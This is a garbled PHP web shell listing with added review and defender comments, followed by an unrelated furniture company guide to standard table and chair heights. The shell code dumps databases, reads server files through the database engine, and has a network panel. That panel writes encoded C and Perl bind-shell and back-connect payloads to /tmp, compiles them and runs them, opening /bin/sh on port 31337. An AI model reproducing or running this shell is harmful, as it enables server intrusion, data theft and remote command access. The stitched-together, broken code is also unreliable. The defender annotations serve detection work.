// selector that every other method switches on. The caller further down this
// listing passes the request's 'type' field here without validation.
// NOTE(review): this class is the SQL client of the web shell shown on this page;
// the listing is extraction-damaged (spaced tokens, typographic quotes) and is
// kept exactly as found.
function DbClass ($ type) {
$ this-> type = $ type;
}
// Open a connection for the backend selected in $this->type and keep the handle
// in $this->link. Returns true when the driver call yields a truthy handle and
// false otherwise (including any type other than 'mysql' / 'pgsql').
// Callers visible in this listing pass the request's sql_host / sql_login /
// sql_pass / sql_base fields straight through.
function connect ($ host, $ user, $ pass, $ dbname) {
switch ($ this-> type) {
case ‘mysql’:
// '@' suppresses driver warnings, so a failed attempt produces no PHP error output;
// $dbname is not used on this branch.
if ($ this-> link = @mysql_connect ($ host, $ user, $ pass , true)) return true;
break;
case ‘pgsql’:
// host is split on ':'; the port falls back to 5432 when none was supplied.
$ host = explode (‘:’, $ host);
if (! $ host [1]) $ host [1] = 5432;
// user, password and dbname are interpolated into the connection string unquoted.
if ($ this-> link = @pg_connect (“host = {$ host [0]} port = {$ host [1]} user = $ user password = $ pass dbname = $ dbname”)) return true;
break;
}
return false;
}
// Select the working database. Only the 'mysql' branch exists; for every other
// type (including 'pgsql', where connect() already put dbname into the
// connection string) this returns false.
function selectdb ($ db) {
switch ($ this-> type) {
case ‘mysql’:
if (@mysql_select_db ($ db)) return true;
break;
}
return false;
}
// Send $str to the selected driver verbatim and remember the result handle in
// $this->res, which fetch() reads by default. No validation or parameter binding
// is applied here; whatever string the caller built is what the server runs.
// NOTE(review): the method name is printed as `function`, while the other methods
// call $this->query(); presumably the name was altered when the page was
// extracted or machine-translated. Confirm against a clean sample.
function function ($ str) {
switch ($ this-> type) {
case ‘mysql’:
return $ this-> res = @mysql_query ($ str);
break;
case ‘pgsql’:
return $ this-> res = @pg_query ($ this-> link, $ str);
break;
}
return false;
}
// Return the next row as an associative array from the driver. With one argument
// that result handle is used; with none, the handle stored in $this->res by the
// last query is used. Returns false for an unknown backend type.
function fetch () {
// func_num_args()/func_get_arg() make the result handle an optional parameter.
$ res = func_num_args ()? func_get_arg (0): $ this-> res;
switch ($ this-> type) {
case ‘mysql’:
return @mysql_fetch_assoc ($ res);
break;
case ‘pgsql’:
return @pg_fetch_assoc ($ res);
break;
}
return false;
}
// Enumerate databases on the connected server: SHOW databases on MySQL, a
// pg_database catalog query on PostgreSQL. Returns the query result, or false
// for an unknown backend type.
// Defender note: a web application account issuing catalog enumeration it never
// normally runs is a useful signal in database audit logs.
function listDbs () {
switch ($ this-> type) {
case ‘mysql’:
return $ this-> query (“SHOW databases”);
break;
case ‘pgsql’:
return $ this-> res = $ this-> query (“SELECT datname FROM pg_database WHERE datistemplate! = ‘t'”);
break;
}
return false;
}
// Enumerate tables in the current database: SHOW TABLES on the first branch, an
// information_schema query that filters out the system schemas on PostgreSQL.
// NOTE(review): the switch header and the first case label were lost in
// extraction (truncated line and blank line below); presumably `case 'mysql':`
// as in the sibling methods. Confirm against a clean sample.
function listTables () {
switch ($ this->

return $ this-> res = $ this-> query (‘SHOW TABLES’);
break;
case ‘pgsql’:
return $ this-> res = $ this-> query (“select table_name from information_schema.tables where table_schema! = ‘information_schema’ AND table_schema! = ‘pg_catalog'”);
break;
}
return false;
}
// Return the driver's last error text for the selected backend, or false for an
// unknown type. Callers in this listing pass the result through
// htmlspecialchars() before printing it.
function error () {
switch ($ this-> type) {
case ‘mysql’:
return @mysql_error ();
break;
case ‘pgsql’:
return @pg_last_error ();
break;
}
return false;
}
// Set the client character set on the open connection: the driver call on either
// backend, with a SET CHARSET statement as the MySQL fallback.
// NOTE(review): the `if (...)` that pairs with the `else` below was lost in
// extraction (blank line after the case label); presumably an availability check
// for mysql_set_charset. Confirm against a clean sample.
function setCharset ($ str) {
switch ($ this-> type) {
case ‘mysql’:

return @mysql_set_charset ($ str, $ this-> link);
else
// $str is appended to the statement unescaped; the callers visible here pass fixed names.
$ this-> query (‘SET CHARSET’. $ str);
break;
case ‘pgsql’:
return @pg_set_client_encoding ($ this-> link, $ str);
break;
}
return false;
}
// Read a file from the database server's filesystem through the database engine
// and return it as array('file' => contents); returns false for an unknown type.
// The path is the request's p2 field (see the 'loadfile' branch of the caller).
// Defender notes: this only works when the database account holds file-read
// rights (the caller checks File_priv on MySQL), so removing that privilege from
// application accounts closes this path. The table name `hard2` and
// LOAD_FILE / COPY ... FROM statements issued by a web application account are
// indicators to search for in database logs.
function loadFile ($ str) {
switch ($ this-> type) {
case ‘mysql’:
// addslashes() is the only escaping applied to the path.
return $ this-> fetch ($ this-> query (“SELECT LOAD_FILE (‘”. addslashes ($ str). “‘ ) as file “));
break;
case ‘pgsql’:
// Three statements in one call: create a scratch table, COPY the file into it, read it back.
$ this-> query (“CREATE TABLE hard2 (file text); COPY hard2 FROM ‘” .addslashes ($ str). “‘; select file from hard2;”);
$ r = array ();
while ($ i = $ this->
fetch ()) $ r [] = $ i [‘file’];
// The scratch table is dropped after reading; if the COPY step fails partway it may be left behind.
$ this-> query (‘drop table hard2’);
return array (‘file’ => implode (“\ n”, $ r));
break;
}
return false;
}
// Export one table as SQL text. Output goes to the file handle $fp when one is
// given, otherwise it is echoed into the HTTP response (the caller sends it as an
// attachment named dump.sql). Always returns false.
// Defender notes: this is the bulk data-export path of the shell. Large
// responses from a script that normally serves small pages, unexpected .sql files
// in web-writable directories, and full-table SELECTs from the application
// account are the traces it leaves.
function dump ($ table, $ fp = false) {
switch ($ this-> type) {
case ‘mysql’:
// The table name is concatenated between backticks without escaping.
$ res = $ this-> query (‘SHOW CREATE TABLE `’. $ table.’` ‘) ;
$ create = mysql_fetch_array ($ res);
$ sql = $ create [1]. “; \ n”;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
$ this-> query (‘SELECT * FROM `’. $ table.’` ‘);
$ i = 0;
$ head = true;
while ($? = $ this-> fetch ()) {
$ sql = ”;
// Every 1000 rows the current INSERT is terminated and a new one is started.
if ($ i% 1000 == 0) {
$ head = true;
$ sql = “; \ n \ n”;
}
$ columns = array ();
// NOTE(review): the loop header and the first condition of this if/elseif chain
// were lost in extraction (blank line below); presumably a foreach over the row
// with a null check. Confirm against a clean sample.

$? [$ k] = “NULL”;
elseif (is_int ($ v))
$? [$ k] = $ v;
else
$? [$ k] = “‘”. @ mysql_real_escape_string ($ v). “‘”;
$ columns [] = “` “. $ k.” “”;
}
if ($ head) {
$ sql. = ‘INSERT INTO `’. $ table.’` (‘.implode (“, “, $ columns).”) VALUES \ n \ t (“. implode (“, ” , $?). ‘)’;
$ head = false;
} else
$ sql. = “\ n \ t, (“. implode (“,”, $?). ‘)’;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
$ i ++;
}
if (! $ head)
if ($ fp) fwrite ($ fp, “; \ n \ n”); else echo (“; \ n \ n”);
break;
case ‘pgsql’:
// PostgreSQL branch: no CREATE TABLE output, one INSERT per row, and values are
// quoted with addslashes() rather than a driver escape function.
$ this-> query (‘SELECT * FROM’. $ table);
while ($? = $ this-> fetch ()) {
$ columns = array ();
foreach ($? as $ k => $ v) {
$? [$ k] = “‘” .addslashes ($ v). “‘”;
$ columns [] = $ k;
}
$ sql = ‘INSERT INTO’. $ table. ‘ (‘.implode (“,”, $ columns).’) VALUES (‘.implode (“,”, $?).’); ‘. “\ n”;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
}
break;
}
return false;
}
};
$ db = new DbClass ($ _ POST [‘type’]);
if ((@ @ _ POST [‘p2’] == ‘download’) && (@ $ _ POST [‘p1’]! = ‘select’)) {
$ db-> connect ($ _ POST [‘sql_host’], $ _POST [‘sql_login’], $ _POST [‘sql_pass’], $ _POST [‘sql_base’]);
$ db-> selectdb ($ _ POST [‘sql_base’]);
switch ($ _ POST [‘charset’]) {
case “Windows-1251”: $ db-> setCharset (‘cp1251’); break;
case “UTF-8”: $ db-> setCharset (‘utf8’); break;
case “KOI8-R”: $ db-> setCharset (‘koi8r’); break;
case “KOI8-U”: $ db-> setCharset (‘koi8u’); break;
case “cp866”: $ db-> setCharset (‘cp866’); break;
}
if (empty ($ _ POST [‘file’]))) {
ob_start (“ob_gzhandler”, 4096);
header (“Content-Disposition: attachment; filename = dump.sql”);
header (“Content-Type: text / plain”);
foreach ($ _ POST [‘tbl’] as $ v)
$ db-> dump ($ v);
exit;
} elseif ($ fp = @fopen ($ _ POST [‘file’], ‘w’)) {
foreach ($ _ POST [‘tbl’] as $ v)
$ db-> dump ($ v, $ fp);
fclose ($ fp);
unset ($ _ POST [‘p2’]);
} else
die (‘<script> alert (“Error! Can \’ t open file”); window.history.back (-1) </ script> ‘);
}
hardHeader ();
echo ”
<h1> Sql browser </ h1> <div class = content>
<form name = ‘sf’ method = ‘post’ onsubmit = ‘fs (this);’> <table cellpadding = ‘2’ cellspacing = ‘0 ‘> <tr>
<td> Type </ td> <td> Host </ td> <td> Login </ td> <td> Password </ td> <td> Database </ td> <td> </ td> </ tr> <tr>
<input type = hidden name = ne value = ”> <input type = hidden name = a value = Sql> <input type = hidden name = p1 value = ‘query’> <input type = hidden name = p2 value = ”> <input type = hidden name = c value = ‘

if (@ $ _ POST [‘type’] == ‘mysql’) echo ‘selected’;
echo “> MySql </ option> <option value = ‘pgsql'”;
if (@ $ _ POST [‘type’] == ‘pgsql’) echo ‘selected’;
echo “> PostgreSql </ option> </ select> </ label> </ td>
<td> <input type = text name = sql_host value = \” “. (empty ($ _ POST [‘sql_host’])? ‘ localhost ‘: htmlspecialchars ($ _ POST [‘ sql_host ‘])). “\”> </ td>
<td> <input type = text name = sql_login value = \ “”. (empty ($ _ POST [‘ sql_login ‘] )? ‘root’: htmlspecialchars ($ _ POST [‘sql_login’])). “\”> </ td>
<td> <input type = text name = sql_pass value = \ “”. (empty ($ _ POST [‘ sql_pass’

if ($ db-> connect ($ _ POST [‘sql_host’], $ _POST [‘sql_login’], $ _POST [‘sql_pass’], $ _POST [‘sql_base’])) {
switch ($ _ POST [‘charset’ ]) {
case “Windows-1251”: $ db-> setCharset (‘cp1251’); break;
case “UTF-8”: $ db-> setCharset (‘utf8’); break;
case “KOI8-R”: $ db-> setCharset (‘koi8r’); break;
case “KOI8-U”: $ db-> setCharset (‘koi8u’); break;
case “cp866”: $ db-> setCharset (‘cp866’); break;
}
$ db-> listDbs ();
echo “<label> <select name = sql_base> <option value = ”> </ option>”;
while ($? = $ db-> fetch ()) {
list ($ key, $ value) = each ($?);
echo ‘<option value = “‘. $ value. ‘”‘. ($ value == $ _ POST [‘sql_base’]? ‘selected’: ”). ‘>’. $ value. ‘</ option>’ ;
}
echo ‘</ select> </ label>’;
}
else echo $ tmp;
} else
echo $ tmp;
echo “</ td>
<td> <input type = submit value = ‘submit’ onclick = ‘fs (d.sf);’> </ td>
<td> <input type = checkbox name = sql_count value = ‘on ‘” (empty ($ _ POST [‘sql_count’])? ”: ‘checked’). “> count the number of rows </ td>
</ tr>
</ table>
<script>
s_db = ‘”. @ addslashes ($ _ POST [‘ sql_base ‘]). “‘;
function fs (f) {
if ( f.sql_base.value! = s_db) {f.onsubmit = function () {};
if (f.p1) f.p1.value = ”;
if (f.p2) f.p2.value = ”;
if (f.p3) f.p3.value = ”;
}
}
function st (t, l) {
d.sf.p1.value = ‘select’;
d.sf.p2.value = t;
if (l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit ();
}
function is () {
for (i = 0; i <d.sf.elements [‘tbl []’]. length; ++ i)
d.sf.elements [‘tbl []’] [i] .checked =! d.sf.elements [‘tbl []’] [i] .checked;
}
</ script> “;
if (isset ($ db) && $ db-> link) {
echo” <br/> <table width = 100% cellpadding = 2 cellspacing = 0> “;
if (! empty ($ _ POST [‘sql_base’])) {
$ db-> selectdb ($ _ POST [‘sql_base’]);
echo “<tr> <td width = 1 style = ‘border-top: 2px solid # 666;’> <span> Tables: </ span> <br> <br> “;
$ tbls_res = $ db-> listTables ();
while ($? = $ Db->
fetch ($ tbls_res)) { list ($ key, $ value) = each ($?);
if (! empty ($ _ POST [‘sql_count’]))
$ n = $ db-> fetch ($ db-> query (‘SELECT COUNT (*) as n FROM’. $ value. ”));
$ value = htmlspecialchars ($ value);
echo “<nobr> <input type = ‘checkbox’ name = ‘tbl []’ value = ‘”. $ value. “‘> & nbsp; <a href = # onclick = \” st (‘”. $ value.” ‘, 1) \ “>”. $ Value. “</a>”. (empty ($ _ POST [‘sql_count’])? ‘& nbsp;’: “<small> ({$ n [‘n’]}) </ small>”). “</ nobr> <br>”;
}
echo “<input type = ‘checkbox’ onclick = ‘is ();’> <input type = submit value = ‘Dump’ onclick = ‘document.sf.p2.value = \” download \ “; document.sf. submit (); ‘> <br> File path: <input type = text name = file value =’ dump.sql ‘

$ num = $ db-> fetch ();
$ pages = ceil ($ num [‘n’] / 30);
echo “<script> d.sf.onsubmit = function () {st (\” “. $ _POST [‘p2’].” \ “, d.sf.p3.value)} </ script> <span>” . $ _ POST [‘p2’]. “” </ Span> ({$ num [‘n’]} records) Page # <input type = text name = ‘p3’ value = “. ((int) $ _ POST [‘p3’]). “>”;
echo “of $ pages”;
if ($ _ POST [‘p3’]> 1)
echo “<a href = # onclick = ‘st (\” “. $ _POST [‘ p2 ‘].'”, ‘. ($ _POST [‘ p3 ‘] – 1). “) ‘> & Lt; Prev </a>”;
if ($ _ POST [‘p3’] <$ pages)
echo “<a href = # onclick = ‘st (\” “. $ _POST [‘ p2 ‘].'”, ($ _POST [‘p3’] + 1). “) ‘> Next & gt; </a>”;
$ _POST [‘p3’] -;
if ($ _ POST [‘type’] == ‘pgsql’)
$ _POST [‘p2’] = ‘SELECT * FROM’. $ _ POST [‘p2’]. ‘ LIMIT 30 OFFSET ‘. ($ _ POST [‘ p3 ‘] * 30);
else
$ _POST [‘p2’] = ‘SELECT * FROM `’. $ _ POST [‘p2’]. ” LIMIT ‘. ($ _ POST [‘ p3 ‘] * 30).’, 30 ‘;
echo “<br> <br>”;
}
if ((@ @ _ POST [‘p1’] == ‘query’) &&! empty ($ _ POST [‘p2’])) {
$ db-> query (@ $ _ POST [‘p2’]);
if ($ db-> res! == false) {
$ title = false;
echo ‘<table width = 100% cellspacing = 1 cellpadding = 2 class = main>’;
$ line = 1;
while ($? = $ db-> fetch ()) {
if (! $ title) {
echo ‘<tr>’;
foreach ($? as $ key => $ value)
echo ‘<th>’. $ key. ‘</ th>’;
reset ($?);
$ title = true;
echo ‘</ tr> <tr>’;
$ line = 2;
}
echo ‘<tr class = “l’. $ line. ‘”>’;
$ line = $ line == 1? 2: 1;
foreach ($? as $ key => $ value) {
if ($ value == null)
echo ‘<td> <i> null </ i> </ td>’;
else
echo ‘<td>’. nl2br (htmlspecialchars ($ value)). ‘</ td>’;
}
echo ‘</ tr>’;
}
echo ‘</ table>’;
} else {
echo ‘<div> <b> Error: </ b>’ .htmlspecialchars ($ db-> error ()). ‘</ div>’;
}
}
echo “<br> </ form> <form onsubmit = ‘d.sf.p1.value = \” query \ “; d.sf.p2.value = this.query.value; document.sf.submit ( ); return false; ‘> <textarea name =’ query ‘style =’ width: 100%; height: 100px ‘> “;
if (! empty ($ _ POST [‘p2’])) &
& ($ _POST [‘p1’]! = ‘Loadfile’)) echo htmlspecialchars ($ _ POST [‘p2’]);
echo “</ textarea> <br/> <input type = submit value = ‘Execute’>”;
echo “</ td> </ tr>”;
}
echo “</ table> </ form> <br/>”;
if ($ _ POST [‘type’] == ‘mysql’) {
$ db-> query (“SELECT 1 FROM mysql.user WHERE concat (` user`, ‘@’, `host`) = USER () AND` File_priv` = ‘y’ “);
if ($ db-> fetch ())
echo “<form onsubmit = ‘d.sf.p1.value = \” loadfile \ “; document.sf.p2.value = this.f.value; document.sf.submit (); return false; ‘> <span> Load file </ span> <input class =’ ​​toolsInp ‘type = text name = f> <input type = submit value =’ submit ‘> </ form> “;
}
if (@ $ _ POST [‘p1’] == ‘loadfile’) {
$ file = $ db-> loadFile ($ _ POST [‘p2’]);
echo ‘<br/> <pre class = ml1> ‘. htmlspecialchars ($ file [‘ file ‘]).’ </ pre> ‘;
}
} else {
echo htmlspecialchars ($ db-> error ());
}
echo ‘</ div>’;
hardFooter ();
}
// "Network tools" panel of the web shell: renders two forms (bind a port to
// /bin/sh, back-connect to a server) and, depending on the request's p1 field
// (bpc / bpp / bcc / bcp), writes an embedded C or Perl source under /tmp,
// builds or runs it in the background, and prints a `ps aux | grep` listing.
// cf(), ex() and which() are defined elsewhere in the file; presumably they write
// a file, run a shell command and locate a binary. Confirm there.
// NOTE(review): this listing is extraction-damaged. The four embedded payload
// strings are truncated, part of the second form and the opening of the request
// handling are missing, and tokens are spaced (e.g. "/ tmp / bp.c"). It is kept
// exactly as found and is not runnable as printed.
// Defender notes: look for /tmp/bp.c, /tmp/bp, /tmp/bp.pl, /tmp/bc.c, /tmp/bc and
// /tmp/bc.pl owned by the web server account, for that account spawning gcc or
// perl, and for listeners or outbound connections from its child processes (the
// bind form defaults to port 31337). Mounting /tmp noexec, removing compilers
// from web hosts and egress filtering limit what this panel can do.
function actionNetwork () {
hardHeader ();
// Embedded payload sources; truncated on this page.
$ back_connect_c = “I2luY2x1ZGUgPHN0ZGlvLmg + DQojaW”;
$ back_connect_p = “IyEvdXNyL”;
$ bind_port_c = “I2luY2x1ZGUgPHN0ZGlvLmg + DQojaW5jbHVkZSA8c3RyaW5nLmg + DQojaW5jbHVkZSA8dW5pc3RkLmg + DQojaWKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9 “;
$ bind_port_p = “IyEvdXNyL + JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0 =”;
echo “<h1> Network tools </ h1>
<form name = ‘nfp’ onSubmit = ‘g (null, null, this.using.value, this.port.value, this.pass.value); return false;’>
<span> Bind port to / bin / sh </ span> <br/>
Port: <input type = ‘text’ name = ‘port’ value = ‘31337’> Password: <input type = ‘text’ name = ‘pass’> Using: <label> <select name = ‘using’> <option value = ‘bpc’> C </ option> <option value = ‘bpp’> Perl </ option> </ select> </ label> <input type = submit value = ‘submit’ >
</ form>
<form name = ‘nfp’ onSubmit = ‘g (null, null, this.using.value, this.server.value, this.port.value); return false;’>
<span> Back- connect to </ span> <br/>
} } if ($ _ POST [‘p1’] == ‘bpc’) { cf (“/ tmp / bp.c”, $ bind_port_c); $? = ex (“gcc -o / tmp / bp /tmp/bp.c”); @unlink (“/ tmp / bp.c”);

$? . = ex (“/ tmp / bp”. $ _ POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bp”). “</ pre>”;
}
// In every branch the request's p2 / p3 fields are concatenated into the command
// line without escaping; the C source is unlinked after the build, while the
// Perl scripts are not removed by the lines shown here.
if ($ _ POST [‘p1’] == ‘bpp’) {
cf (“/ tmp / bp.pl”, $ bind_port_p);
$? = ex (which (“perl”). “/tmp/bp.pl”. $ _ POST [‘p2’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bp.pl”). “</ pre>”;
}
if ($ _ POST [‘p1’] == ‘bcc’) {
cf (“/ tmp / bc.c”, $ back_connect_c);
$? = ex (“gcc -o / tmp / bc /tmp/bc.c”);
@unlink (“/ tmp / bc.c”);
$? . = ex (“/ tmp / bc”. $ _POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bc”). “</ pre>”;
}
if ($ _ POST [‘p1’] == ‘bcp’) {
cf (“/ tmp / bc.pl”, $ back_connect_p);
$? = ex (which (“perl”). “/tmp/bc.pl”. $ _ POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
echo “<pre class = ml1> $?”. ex (“ps aux | grep bc.pl”). “</ pre>”;
}
}
echo ‘</ div>’;
hardFooter ();
}
// Request dispatcher: the POST field 'a' names the panel to run. When it is empty
// a default is used (a variable whose name was lost in extraction, printed as
// `$?`, else 'FilesMan'); the string 'action' + name is then called through
// call_user_func() if a function of that name exists.
// Defender notes: function_exists() is the only gate visible here, so any
// action* function in the file is reachable by request. In HTTP logs this shows
// up as repeated POSTs to one script with little or no query string; the panel
// name is in the body, which the top of the file shows being decrypted with a
// cookie-held key unless the 'ne' field is present, so request bodies in a
// capture may not be readable as-is.
if (empty ($ _ POST [‘a’]))
if (isset ($?) && function_exists (‘action’. $?))
$ _POST [‘a’] = $ ?;
else
$ _POST [‘a’] = ‘FilesMan’;
if (! empty ($ _ POST [‘a’]) && function_exists (‘action’. $ _POST [‘a’]))
call_user_func (‘action’. $ _POST [‘a’]);
?>

A Guide to Standard Table and Chair Heights

Average standard table heights vary between countries and companies, so it’s important to check supplied dimensions before buying furniture online, or take your own measurements. You can also contact your contractor to take measurements of your space and offer recommendations on the best dining table height and size for your design.

Matching your table and chair height is important for guests to feel natural and have space to move their elbows and cross their legs. Below we list the general standard table and counter heights for dining, kitchens, living rooms, offices, bathrooms and more. You can also read how to calculate the best table size for your room.

What Is Standard Table Height?

There is no exact industry standard for table height, although many companies produce furniture in line with average table and chair heights sold in their country.

In any case, doing your own measurements and calculations is important, especially if you’re trying to match table and chairs from different suppliers. If you’re opting for custom furniture, we explain in detail below how to calculate table and chair height.

| | Average Table Height Range | Standard Table Height (inches) | Standard Table Height (cm) |
|---|---|---|---|
| Standard dining table height | 28–30 inches | 30 inches | 76cm |
| Standard kitchen table height | 28–30 inches | 30 inches | 76cm |
| Standard counter height | 34–39 inches | 36 inches | 91.5cm |
| Standard bar table height | 40–43 inches | 42 inches | 106.5cm |
| Standard coffee table height | 18–20 inches | 20 inches | 51cm |
| Standard side table height | 22–30 inches | 25 inches | 63.5cm |
| Standard console table height | 24–42 inches | 30 inches | 76cm |
| Standard nightstand height | 24–28 inches | 25 inches | 63.5cm |
| Standard office desk height | 28–30 inches | 29 inches | 73.5cm |
| Standard bathroom counter height | 30–36 inches | 32 inches | 81cm |

What Is Standard Chair Height?

Similar to table height, there is no definite industry standard for chair heights.

Chair heights generally range up to 17–19 inches (43–48cm) from the chair leg to the top of the seat, while stool heights can range from 16–23 inches (40–58cm) due to their minimalism. These chair heights are standard to fit under tables from 28–30 inches (71–76cm). You should also account for any apron (support beam) under the table.

For comfortable seating, it is recommended to allow at least 9–13 inches (23–33cm) between your table or counter and the chair seat, with 12 inches (30.5cm) being a spacious allowance.  This allows guests to comfortably cross their legs under the table.

| | Average Chair Height Range | Standard Chair Height (inches) | Standard Chair Height (cm) |
|---|---|---|---|
| Dining table chair heights | 17–19 inches | 18 inches | 45–50 cm |
| Kitchen table chair heights | 17–19 inches | 18 inches | 45–50 cm |
| Desk chair heights | 17–19 inches | 18 inches | 45–50 cm |
| Counter chair heights | 24–26 inches | 24 inches | 61cm |
| Bar chair heights | 28–32 inches | 30 inches | 76cm |

Calculating Standard Table & Chair Heights

Below are some examples of comfortable chair heights to match certain standard dining heights. For more space, consider stools or benches as a seating choice.

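| Standard Dining Table Heights | 28 inches | 29 inches | 30 inches | 32 inches | 36 inches | 40 inches | 42 inches |
|---|---|---|---|---|---|---|---|
| Standard Chair Heights | 15–19 inches | 16–20 inches | 17–21 inches | 19–23 inches | 23–27 inches | 27–31 inches | 29–33 inches |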

How to Measure Table Height

Standard table height measurements are taken from the floor to the top of the table or counter. This means you need to consider a lower chair height if you have a thick table top or overhanging counter.

How to Measure Chair Height

Standard chair heights are measured from the chair legs to the top of the seat surface. You do not include the height of the chair back or armrests in your measurements, unless you plan to slide chairs fully under the table or counter.

If you are choosing chairs with armrests, allow around 7 inches (18cm) between the armrest and the underside of your table or apron.

Bench seating is measured in the same way. The ADA sets a standard bench seat height of 17–19 inches (43–48cm) above the floor.

Standard Dining Table Height

Standard Dining Table Height

The standard dining room table height is around 28–30 inches (71–76cm) from the ground to table top surface.

Formal dining tables tend to be closer to 30 inches, while informal dining table heights average around 29 inches tall. Older tables also tend to be lower, around 28–29 inches.

Varying the height of a standard dining height can feel unnatural, however slight. This is sometimes caused by placing a very thick table top onto a standard base height, so considering these aspects is especially important when deciding measurements for custom furniture.

Low Dining Table Height

If you opt for lounge-style or low seating – with seat heights below 16 inches (40cm) – you may be able to fit a lower dining table height of around 26 inches (66cm).

Standard Kitchen Table Height, Islands and Counters

Kitchen table heights are the same as dining table heights, around 30 inches (76cm).

However, if you want seating for a kitchen island or counter, you should consider a taller height. Counter table heights are usually set at 34–39 inches (86–99cm), with 36 inches (91.5cm) being a standard size. Read more on how to calculate the ideal bar or counter stool height.

Standard Kitchen Table Height

Standard Console Table Height

Console tables are often pushed against a wall or behind a sofa, so these aspects influence the standard console table heights. In general, a console table should be not taller than the sofa back height, and can be up to 1 inch (2.5cm) below.

For entry console tables and buffet consoles, aim for around 33 inches (84cm). Otherwise, console tables are typically the same height as dining tables (28–30 inches).

TV consoles are typically higher. For optimal TV viewing height, measure around 42 inches (107cm) from the floor to the TV’s centre and calculate your ideal console height. This allows for a sofa seat height of 18 inches, plus 24 inches which is the general eye-level of an adult in a relaxed seating position.

Standard Coffee Table Height

Coffee tables are usually set at around 18–20 inches (45–50cm) high, to create a comfortable balance between standard sofa and chair heights.

Otherwise, the standard coffee table height is usually the same height as the cushions on your sofa, or within 1–2 inches (2.5–5cm) lower.

Other design rules include leaving a walkway space of 12–18 inches (30–45cm) between your coffee table and sofa, plus choosing a coffee table that is around two-thirds the length of your sofa.

Standard Coffee Table Height

Standard Nightstand Height

There is no standard nightstand height as it is typically tied to the height of the mattress. However, the most common bed height is around 25 inches (63.5cm), and most nightstands range between 24–28 inches (61–71cm). Tables don’t have to be identical heights, but should be within 2 inches (5cm) of each other to create visual balance.

From a lying position, it is more comfortable to raise your arm than lower it. For this reason, the average nightstand height is measured to line up with the top of your mattress or up to 2–6 inches (5–15cm) higher.

Standard Side Table Height

Standard Side Table Height

Side tables are functional furniture pieces used for lounge seating or hallways, so measurements change depending on the surrounding furniture and the function – for example, setting down a drink or placing a lamp.

Standard side table heights are usually designed to be equal to or just below the height of sofa armrests, which are around 25 inches (63.5cm), although this varies widely so exact measurements are important. Most side tables are between 22–30 inches (56–76cm).

A general rule is to keep your side table height within 2 inches of the sofa armrest height; for example, if a sofa arm is 24 inches high, an appropriate side table height would be 22–26 inches. If you can’t find an appropriate side table height for your sofa, aim for shorter rather than taller, to make it easy to set a drink or book down.

If you plan to use the side table for a lamp, choose a side table height so that the base of the lampshade isn’t higher than eye level when seated next to it. If the lamp won’t be at an eye-level, consider a side table height that works with surrounding furniture, lamp size or ceiling height.

There are exceptions where taller side tables can work, for example, if there is a set of side tables where at least one is below the armrest height, or the side table serves another function in a high-ceilinged room or hallway.

If your sofa has no armrests, calculate the standard side table height in line to where the arms would be, or choose a table at the same height as the seat height.

Standard Bathroom Counter Height

If you’re installing a bathroom counter, the standard height is around 34–35 inches (86–89cm). If you plan to install a built-in vanity, you may consider lowering it to the standard 30 inches, for chairs with a seat height of 17–19 inches.

Bathroom vanity cabinets are usually a standard height of 32 inches (80cm), although range from 30–36 inches. Newer, modern vanities are sometimes higher, starting at 36 inches (91cm), referred to as ‘comfort’ vanities because you don’t need to bend to wash your hands.

The Americans with Disabilities Act sets the minimum and maximum standard vanity heights at 29–34 inches (with built-in sinks).

Standard Bar Table Height

Bar tables range in height from 40–43 inches (102–109cm), although 42 inches (107cm) is a typical standard bar table height. You can comfortably customize a bar table height up to 44–47 inches (112–119cm) for a modern look, although consider a higher bar stool height as well. We provide a table of standard bar stool heights.

Standard Office Desk Height

Most work desk heights are between 28 and 30 inches, which is really only a suitable height for people from 5 ft 8 inches to 5 ft 10 inches (173–178cm) with a conventional desk chair. Standard desk chair heights range from 16–21 inches (40–53cm).

This is obviously not an ergonomic option for everybody. If you are taller or shorter, consider a different desk height, rather than choosing a different chair. Adjustable desks, for example, allow a range of 22–33 inches (56–84cm).

The Proper Office Desk for Your Height

If you spend long hours sitting, the right office desk height is important for comfort and posture.

Your desk and chair height should be matched so that in a seated position, your arms rest at a comfortable 90 degree angle on the desk. To find the right position, the chair should be adjusted so the seat top sits just below your knee cap. When you sit at the table, your knees should also be at a 90 degree angle, with your feet flat on the floor.

Standard Standing Desk Height

The same rule applies for determining the ideal standing desk height; your arms should rest at a perfect 90 degree angle on the table when standing beside it.

Custom Table and Chair Heights

If you’re having trouble matching table and chair heights from standard furniture collections, consider custom furniture as a solution. Custom wooden furniture, for example, can be easily adapted to fit with modern chair designs, or vice versa.

 

© Parotas.com

PAROTAS is a team of carpenters, designers and architects who focus on producing sustainable wooden furniture. We use certified parota wood sustainably sourced from Mexico. Contact PAROTAS to ask about custom wooden furniture or a design project.

Read more:

How to calculate the best dining table size for your room

What are the most sustainable materials – for building, furniture and design projects?

Unique Wood Table Ideas for Modern Designs

There are many ways to fit wood table ideas into modern and contemporary designs. Wooden tables are timeless pieces making them one of the most sustainable furniture choices, especially simple and minimalist table designs that stay in style for generations.

To narrow down your wood table ideas, consider how to create visual balance in your room. You will need to account for the room size, seating capacity you want, seating space per person, and other variables, such as other furniture in the room or mat size. We explain below how to calculate the space needed for visual design, to help you choose the best wooden table for your space.

